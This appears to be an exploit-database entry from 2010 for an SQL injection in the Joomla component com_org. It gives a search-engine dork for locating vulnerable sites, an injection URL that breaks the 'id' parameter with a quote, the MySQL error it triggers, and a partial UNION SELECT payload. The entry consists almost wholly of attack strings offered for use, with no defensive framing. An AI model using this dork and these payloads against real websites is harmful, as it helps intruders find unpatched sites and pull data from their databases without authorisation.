id: 11287
date: 03/14/2010
title: Joomla Component com_org SQL Injection Vulnerability
author: N2n-Hacker
cves: 

====================================================
Joomla Component com_org SQL Injection Vulnerability
====================================================

###############################################################################
##                                                                           ##
##          Joomla com_org SQL Injection Vulnerability                      ##
##                                                                           ##
###############################################################################

 
*******************************************************************************
=> Dork = inurl:"option=com_org"
 
-------------------------------------------------------------------------------
# EXp : http://www.website.com/path/index.php?option=com_org&task=info&id=22' <=[SQLI] --&lang=en
 
Error = "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version"
 
# http://www.website.com/path/index.php?option=com_org&task=info&id=-22 UNION SELECT 1,2 ..... --&lang=en
 
 
********************************************************************************



#  0day.today [2023-03-25]  #